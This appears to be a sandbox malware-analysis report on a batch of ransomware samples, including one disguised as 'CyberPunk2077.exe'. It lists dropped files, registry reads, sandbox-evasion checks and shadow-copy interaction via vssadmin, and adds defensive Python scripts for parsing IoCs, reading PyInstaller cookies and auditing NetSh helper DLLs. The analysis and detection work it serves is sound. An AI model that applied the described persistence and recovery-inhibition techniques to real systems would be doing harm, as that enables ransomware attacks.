description ioc Process File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Assets\SmallLogo.scale-100.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-appmanagement-uevagent_31bf3856ad364e35_10.0.19041.1288_none_71734bf99a2a6955\Microsoft.Uev.SyncController.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.746_none_492c8c53f3547077\r\PerceptionSimulationInput.exe CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-u..etry-client-wowonly_31bf3856ad364e35_10.0.19041.1_none_4c7da197e5837576\dtdump.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-appx-deployment-server_31bf3856ad364e35_10.0.19041.264_none_3f30ef10158954bf\ApplyTrustOffline.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\eventTracepointDisabled.png CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.546_none_5163f0069562aff6\r\powershell.exe CyberPunk2077.exe File created C:\Windows\WinSxS\x86_wpf-terminalserverwpfwrapperexe_31bf3856ad364e35_10.0.19041.1_none_7e31b18ab29f9913\TsWpfWrp.exe CyberPunk2077.exe File created C:\Windows\ImmersiveControlPanel\images\TileSmall.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.173_none_6486f23c2831aaf3\InputApp\InputApp\Assets\SquareLogo310x310.scale-400.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.19041.546_none_476476bb5c3a0bbc\SquareTile44x44.targetsize-48_altform-unplated_contrast-black_devicefamily-colorfulunplated.png CyberPunk2077.exe File created 
C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\MicrosoftEdgeSquare150x150.scale-125_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\MicrosoftEdgeSquare44x44.targetsize-24_altform-unplated_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-unp_31bf3856ad364e35_10.0.19041.1266_none_21c0be7c0dad3632\f\UpdateNotificationMgr.exe CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-registry-editor_31bf3856ad364e35_10.0.19041.746_none_dc7caa836f08ad57\r\regedit.exe CyberPunk2077.exe File created C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare44x44Logo.targetsize-20_contrast-white.png CyberPunk2077.exe File created C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare44x44Logo.targetsize-256_altform-unplated_contrast-black.png CyberPunk2077.exe File created C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\AppListIcon.targetsize-20.png CyberPunk2077.exe File created C:\Windows\WinSxS\x86_netfx4-ngen_exe_b03f5f7f11d50a3a_4.0.15805.0_none_faaa7cb4e8f21456\ngen.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-c..ngshellapp.appxmain_31bf3856ad364e35_10.0.19041.746_none_0b4ed891dd9ccbc8\Square44x44Logo.targetsize-24.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-dxp-deviceexperience_31bf3856ad364e35_10.0.19041.746_none_251e769058968366\settings.ico CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1_none_d0af17ec366548f3\splashscreen.contrast-white_scale-400.png CyberPunk2077.exe File created 
C:\Windows\WinSxS\amd64_windows-defender-offline-amcore_31bf3856ad364e35_10.0.19041.1202_none_b9662ef4fe1412ad\f\OfflineScannerShell.exe CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.19041.746_none_476e348ff3b593af\cmmon32.exe CyberPunk2077.exe File created C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Ratings\RatingStars49.scale-200.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-hvsi-csp_31bf3856ad364e35_10.0.19041.844_none_c606f47e6aa94b5b\r\hvsievaluator.exe CyberPunk2077.exe File created C:\Windows\WinSxS\x86_netfx-aspnet_webadmin_images_b03f5f7f11d50a3a_10.0.19041.1_none_6fa7e5bbaa15a17d\ASPdotNET_logo.jpg CyberPunk2077.exe File created C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Assets\PeopleLogo.targetsize-36_altform-unplated_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.1_none_75cd350cc8b5dbcf\breakpointUnbound.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\restore.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-tapicore_31bf3856ad364e35_10.0.19041.746_none_c2332356a565df1c\dialer.exe CyberPunk2077.exe File created C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Assets\square150x150logo.scale-200_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-filehistory-ui_31bf3856ad364e35_10.0.19041.746_none_2c2bcd67e9d4665c\r\FileHistory.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1202_none_8f7e37524c3e1a13\TinyTile.scale-125.png CyberPunk2077.exe File created 
C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.423_none_72535ca9b59a9515\NarratorUWPSplashScreen.scale-200_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-s..ast-white.searchapp_31bf3856ad364e35_10.0.19041.1_none_2f147508fcb33106\AppListIcon.scale-100.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-onecoreua..uetooth-userservice_31bf3856ad364e35_10.0.19041.746_none_e6778e5b0114e5b0\KeyboardSystemToastIcon.contrast-white.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-a..-experience-apphelp_31bf3856ad364e35_10.0.19041.928_none_6012c8cabf808ff7\@AppHelpToast.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\headermaximize.png CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-web-app-host_31bf3856ad364e35_10.0.19041.789_none_1ab57d24625888e6\r\WWAHost.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.423_none_72535ca9b59a9515\NarratorUWPSquare150x150Logo.scale-100_contrast-white.png CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_de-de_d7f4b3c0973f3fda\SqlPersistenceService_Logic.sql CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-filepicker.appxmain_31bf3856ad364e35_10.0.19041.1023_none_374973298940e35c\SquareTile150x150.scale-200.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1023_none_228521f0037fd996\r\PickerHost.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-rpc-ping_31bf3856ad364e35_10.0.19041.1_none_53ab1b93e0160a53\RpcPing.exe CyberPunk2077.exe File created 
C:\Windows\WinSxS\wow64_microsoft-windows-terminalservices-theme_31bf3856ad364e35_10.0.19041.746_none_be3404fb0dff5d84\TSTheme.exe CyberPunk2077.exe File created C:\Windows\SystemResources\Windows.UI.AccountsControl\Images\Outlook.Theme-Dark_Scale-400.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\MicrosoftEdgeSquare44x44.targetsize-64_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_netfx35linq-linqwebconfig_31bf3856ad364e35_10.0.19041.1_none_0cfdc32c8765ead4\LinqWebConfig.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-n..35cdfcomp.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_3424e955efd79eef\DropSqlPersistenceProviderSchema.sql CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-p..-personalizationcsp_31bf3856ad364e35_10.0.19041.746_none_1eeb97b23978a488\desktopimgdownldr.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-ui-shellcommon-core_31bf3856ad364e35_10.0.19041.1_none_91b1f58702057373\WiFiNetworkManagerToast.scale-400.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-onecore-d..ectxdatabaseupdater_31bf3856ad364e35_10.0.19041.928_none_138fb436497565f4\directxdatabaseupdater.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-c..ngshellapp.appxmain_31bf3856ad364e35_10.0.19041.84_none_24f8aafdaceaf0b5\square44x44logo.scale-150_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-edp-task_31bf3856ad364e35_10.0.19041.1023_none_67d9ae9ccb89c9b7\@edptoastimage.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-xbox-gamecallableui.appxmain_31bf3856ad364e35_10.0.19041.746_none_0119299746221375\SplashScreen.scale-100.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_netfx-aspnet_state_exe_b03f5f7f11d50a3a_10.0.19041.1_none_fa5853083f6020df\aspnet_state.exe 
CyberPunk2077.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\SQL\es\DropSqlWorkflowInstanceStoreLogic.sql CyberPunk2077.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\SQL\es\DropSqlWorkflowInstanceStoreSchema.sql CyberPunk2077.exe File created C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Assets\square44x44logo.scale-150_contrast-white.png CyberPunk2077.exe File created C:\Windows\SystemResources\Windows.SystemToast.Calling\Images\AnswerWithVideo.scale-150.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-u..te-musnotifyiconexe_31bf3856ad364e35_10.0.19041.1266_none_adfc223229a335a6\r\MusNotifyIcon.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-ui-shell-component_31bf3856ad364e35_10.0.19041.746_none_2b9acc2d69574796\Icon_MMXresume.contrast-white_scale-100.png CyberPunk2077.exe File created C:\Windows\ImmersiveControlPanel\images\wide.Apps.png CyberPunk2077.exe -
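The two "Drops file" tables above list one path per event with the process that touched it, which hides the facts an analyst actually wants: which sample appends which extension, which ransom-note name belongs to which process, and that several files carry two encryptor extensions (libbluray-awt-j2se-1.3.2.jar.pysa.LKEED, UnlockResize.gif.LKEED.pysa, PowerPntLogo.contrast-white_scale-100.png.DEMON.LKEED), meaning one sample re-encrypted another's output because the archive's samples ran side by side in the same VM. The script below is an added example, not part of the report or of any tool it names. It parses rows in the report's flattened "action path process" form and derives those facts; the rows embedded in it are copied from the tables above, and the extension set (.pysa, .LKEED, .DEMON) and the ransom-note name pattern are taken from those same rows and would need extending for other reports.

```python
import re
from collections import Counter, defaultdict

# Extensions the encryptors in this report append, taken from the rows above.
RANSOM_EXTS = {"pysa", "LKEED", "DEMON"}
# Ransom notes are recognised by name pattern rather than a fixed list.
NOTE_NAME = re.compile(r"readme|restore[-_ ]?my[-_ ]?files", re.IGNORECASE)
# "<action> <path with spaces> <process without spaces>"
ROW = re.compile(r"^(File created|File opened for modification|File opened \(read-only\))\s+(.+?)\s+(\S+)$")

# Rows copied from the two "Drops file" tables above, one per line.
SAMPLE_ROWS = r"""
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-awt-j2se-1.3.2.jar.pysa.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe.DEMON HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
File opened for modification C:\Program Files\UnlockResize.gif.LKEED.pysa HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Restore-My-Files.txt HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\nashorn.jar.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe
File created C:\Program Files\VideoLAN\VLC\locale\ka\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_RHP.aapp.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\Readme.README HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
File created C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.546_none_5163f0069562aff6\r\powershell.exe CyberPunk2077.exe
"""


def parse_row(line):
    """Split one flattened IoC row into (action, path, process); None if it is not a row."""
    m = ROW.match(line.strip())
    return m.groups() if m else None


def ransom_suffixes(filename):
    """Trailing extension tokens that belong to an encryptor, in the order they were appended."""
    parts = filename.split(".")
    chain = []
    while len(parts) > 1 and parts[-1] in RANSOM_EXTS:
        chain.insert(0, parts.pop())
    return chain


def summarize(text):
    """Per-process counts, extension chains and ransom-note names derived from IoC rows."""
    out = defaultdict(lambda: {"modified": 0, "created": 0, "chains": Counter(), "notes": set()})
    for line in text.splitlines():
        row = parse_row(line)
        if not row:
            continue
        action, path, proc = row
        name = path.rsplit("\\", 1)[-1]
        chain = tuple(ransom_suffixes(name))
        entry = out[proc]
        if action == "File created":
            entry["created"] += 1
            # a freshly created, unencrypted file with a note-like name is a ransom note
            if not chain and NOTE_NAME.search(name):
                entry["notes"].add(name)
        elif action == "File opened for modification":
            entry["modified"] += 1
        if chain:
            entry["chains"][chain] += 1
    return dict(out)


def double_encrypted(text):
    """Paths carrying two or more encryptor extensions: one sample re-encrypted another's output."""
    hits = []
    for line in text.splitlines():
        row = parse_row(line)
        if row:
            chain = ransom_suffixes(row[1].rsplit("\\", 1)[-1])
            if len(chain) >= 2:
                hits.append((row[1], tuple(chain)))
    return hits


if __name__ == "__main__":
    for proc, entry in summarize(SAMPLE_ROWS).items():
        print(proc[:48], entry["modified"], "modified,", entry["created"], "created,",
              dict(entry["chains"]), sorted(entry["notes"]))
    for path, chain in double_encrypted(SAMPLE_ROWS):
        print("double-encrypted:", path, "->", ".".join(chain))
```

Attribution of an extension to a process is only a heuristic here: UnlockResize.gif.LKEED.pysa was opened for modification by the Wanna.gen sample even though .pysa is the outer extension, so a file touched by several encryptors will show up under each of them. The chain order (inner extension first) is the reliable fact, because it is the order in which the encryptors reached the file.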
Detects Pyinstaller 2 IoCs
resource yara_rule
behavioral1/files/0x000a000000023b98-162.dat pyinstaller
behavioral1/files/0x0008000000023d81-1799.dat pyinstaller -
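The two files were matched by a YARA rule named pyinstaller. One marker such rules can key on is PyInstaller's archive cookie: an 8-byte magic followed by the archive length, table-of-contents offset and length, the Python version and, in the 2.1 cookie layout, the NUL-padded Python DLL name, written at the end of the built executable. The parser below is an added example, not Triage's rule and not PyInstaller's own code. It runs on a constructed blob (filler bytes plus a hand-packed cookie) rather than on either .dat file above; pass a real file path on the command line to check one. The version decoding covers both encodings PyInstaller has used (major*10+minor in older releases, major*100+minor in newer ones) and picks one by the value's magnitude.

```python
import struct

# PyInstaller writes this 8-byte magic at the start of the archive cookie that
# sits at the end of a packed binary.
PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_V20 = struct.Struct("!8siiii")     # magic, archive length, TOC offset, TOC length, python version
COOKIE_V21 = struct.Struct("!8siiii64s")  # the same fields plus a NUL-padded Python DLL name


def _decode_pyvers(v):
    """Older PyInstaller releases stored major*10+minor (38); newer ones store major*100+minor (311)."""
    return (v // 100, v % 100) if v >= 100 else (v // 10, v % 10)


def find_pyinstaller_cookie(data):
    """Parse the trailing cookie; returns a dict for PyInstaller output, None otherwise."""
    idx = data.rfind(PYINST_MAGIC)
    if idx < 0 or idx + COOKIE_V20.size > len(data):
        return None
    _, pkg_len, toc_off, toc_len, pyvers = COOKIE_V20.unpack_from(data, idx)
    info = {
        "cookie_offset": idx,
        "archive_length": pkg_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        "python": _decode_pyvers(pyvers),
        # the TOC must lie inside the archive; a violation means a forged or truncated cookie
        "consistent": 0 <= toc_off and toc_off + toc_len <= pkg_len,
    }
    # the 2.1 layout carries 64 more bytes naming the bundled Python DLL
    if idx + COOKIE_V21.size <= len(data):
        pylib = COOKIE_V21.unpack_from(data, idx)[5].rstrip(b"\0")
        if pylib and all(32 <= b < 127 for b in pylib):
            info["pylib"] = pylib.decode("ascii")
    return info


def build_fake_pyinstaller_blob():
    """Constructed stand-in for a packed binary: filler bytes followed by a v2.1 cookie."""
    filler = b"MZ" + b"\x90" * 120  # not a real PE; only the trailing cookie matters here
    cookie = COOKIE_V21.pack(PYINST_MAGIC, 4096, 3500, 512, 311, b"python311.dll".ljust(64, b"\0"))
    return filler + cookie


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_fake_pyinstaller_blob()
    print(find_pyinstaller_cookie(blob))
```

A cookie found at an offset that is not near the end of the file, or one whose table of contents falls outside the declared archive length, is worth a second look: it can mean an overlay or signature was appended after packing, or that the bytes are a decoy. Either way the pylib name and the Python version are the fastest way to pick the right extractor for the bundled .pyc files.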
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. On start-up it loads every helper DLL registered under HKLM\SOFTWARE\Microsoft\NetSh, so adding a DLL there gives an attacker code execution whenever netsh runs (MITRE ATT&CK T1546.007). The six events below are netsh.exe reading that key, which happens on every netsh invocation; the two identical open/query/enumerate triplets indicate netsh was run twice, not that a helper was planted. Evidence of the technique would be a value set under this key (for example via netsh add helper), not a read.
description ioc Process
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
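Deciding whether a helper DLL was actually planted means looking at the key's values, not at netsh.exe reading them. The script below is an added example and not part of the report: it parses a reg export of HKLM\SOFTWARE\Microsoft\NetSh and flags helpers whose DLL is an absolute path outside System32, a UNC path, or a name missing from a baseline. The export text is constructed, the updhelper entry in it is a hypothetical planted helper, the four-name baseline is illustrative only (capture the real one from a clean host of the same Windows build), and the System32 path assumes a default install.

```python
import re

NETSH_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh"
SYSTEM32 = r"c:\windows\system32"  # assumes a default install location
VALUE_LINE = re.compile(r'^"([^"]+)"="(.*)"$')
KEY_LINE = re.compile(r"^\[(.+)\]$")

# Illustrative baseline of helper DLL names; build the real list from a clean host.
BASELINE = {"ifmon.dll", "rasmontr.dll", "wlancfg.dll", "nshhttp.dll"}

# Constructed `reg export`-style dump of the NetSh key. REG_SZ backslashes are
# doubled in .reg files. "updhelper" is a hypothetical planted helper.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh]
"ifmon"="ifmon.dll"
"rasmontr"="rasmontr.dll"
"wlancfg"="wlancfg.dll"
"updhelper"="C:\\Users\\Public\\Libraries\\updhelper.dll"
"nshhttp"="nshhttp.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Other]
"ignored"="not a helper"
'''


def parse_netsh_export(text):
    """Map helper value name -> DLL path for values directly under the NetSh key."""
    helpers, in_key = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        key = KEY_LINE.match(line)
        if key:
            in_key = key.group(1).lower() == NETSH_KEY.lower()
            continue
        value = VALUE_LINE.match(line) if in_key else None
        if value:
            # undo the .reg escaping of backslashes
            helpers[value.group(1)] = value.group(2).replace("\\\\", "\\")
    return helpers


def audit_helpers(helpers, baseline=BASELINE):
    """Return (name, dll, reason) for every registered helper that deserves a look."""
    findings = []
    for name, dll in helpers.items():
        low = dll.lower()
        if low.startswith("\\\\"):
            findings.append((name, dll, "UNC path: helper loaded from a network share"))
        elif "\\" in low:
            if not low.startswith(SYSTEM32 + "\\"):
                findings.append((name, dll, "absolute path outside System32"))
            elif low.rsplit("\\", 1)[1] not in baseline:
                findings.append((name, dll, "not in baseline"))
        elif low not in baseline:
            # a bare name is resolved through the DLL search order, so an unknown one is suspect
            findings.append((name, dll, "bare name not in baseline (resolved via DLL search order)"))
    return findings


if __name__ == "__main__":
    for name, dll, reason in audit_helpers(parse_netsh_export(SAMPLE_EXPORT)):
        print(f"{name}: {dll} -> {reason}")
```

Run it against `reg export HKLM\SOFTWARE\Microsoft\NetSh netsh.reg` taken from the host in question (the export is UTF-16; decode before passing the text in). A bare DLL name that is not in the baseline is as interesting as an absolute path, because a DLL of that name dropped into a directory earlier in the search order would be loaded by netsh just the same.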
Program crash 5 IoCs
pid pid_target Process procid_target
2448 3448 WerFault.exe 124
5744 4292 WerFault.exe 156
6920 6876 WerFault.exe 161
5608 4292 WerFault.exe 156
7040 1824 WerFault.exe 115
pid_target is the process that faulted; 4292 (procid_target 156) crashed twice and spawned a separate WerFault.exe instance each time. -
System Location Discovery: System Language Discovery 1 TTPs 31 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host (MITRE ATT&CK T1614.001). Reading HKLM\SYSTEM\ControlSet001\Control\NLS\Language is also part of ordinary process start-up, which is why csrss.exe, svchost.exe, cmd.exe, reg.exe and wscript.exe appear below next to the samples; the read on its own is not evidence of geo-fencing. What matters is whether a sample exits or skips encryption after the read, and that decision is not recorded in this table.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by each of the following processes (31 events, in report order):
HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe
Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe
cmd.exe
Trojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exe
CyberPunk2077.exe
HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe
497D8E.exe
cmd.exe
reg.exe
Trojan-Ransom.Win32.Foreign.nmxn-a7c1706b88b29404d24806876ad8b4473d2f515ea517605d8568c6f1c686b594.exe
Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe
CyberPunk2077.exe
Trojan-Ransom.Win32.Gen.yfd-5dc8fd209538c67f0a27c941047bf4349354ca41bd2da45683890f0a2da9a7e6.exe
UDS-Trojan-Ransom.Win32.Encoder-63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be.exe
HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe
cmd.exe
HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe
HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe
HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe
Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe
Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
CyberPunk2077.sfx.exe
wscript.exe
Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe
HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe
csrss.exe
svchost.exe
HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe -
Checks SCSI registry key(s) 3 TTPs 10 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6872 vssadmin.exe -
Modifies Internet Explorer start page 1 TTPs 1 IoCs
description | ioc | Process
